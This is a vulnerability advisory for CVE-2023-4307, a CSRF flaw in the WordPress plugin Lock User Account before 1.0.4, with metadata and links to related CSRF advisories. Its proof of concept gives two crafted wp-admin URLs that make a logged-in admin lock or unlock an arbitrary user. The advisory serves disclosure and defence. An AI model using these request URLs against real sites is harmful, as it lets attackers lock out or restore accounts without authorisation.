Lock User Account < 1.0.4 – Arbitrary Account Lock/Unlock via CSRF | CVE 2023-4307 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged in admins lock and unlock arbitrary users via a CSRF attack

Proof of Concept

Make a logged in admin open one of the links below, this will make them lock/unlock the user with ID 5

https://example.com/wp-admin/users.php?action=lock&action2=lock&users%5B0%5D=5

https://example.com/wp-admin/users.php?action=unlock&action2=unlock&users%5B0%5D=5

Affects Plugins

lock-user-account

Fixed in 1.0.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3

Timeline

Publicly Published

2023-08-21 (about 2 years ago)

Added

2023-08-21 (about 2 years ago)

Last Updated

2024-01-26 (about 1 year ago)

Other

Published

Title

Published

2024-02-02

Title

Quicksand Post Filter jQuery Plugin <= 3.1.1 - Cross-Site Request Forgery via renderAdmin

Published

2024-03-28

Title

GamiPress < 6.8.6 - Cross-Site Request Forgery

Published

2025-04-04

Title

JobWP < 2.4.0 - Cross-Site Request Forgery

Published

2023-08-02

Title

Upload Media By URL < 1.0.8 - Stored XSS via CSRF

Published

2022-05-26

Title

underConstruction < 1.20 - Construction Mode Deactivation via CSRF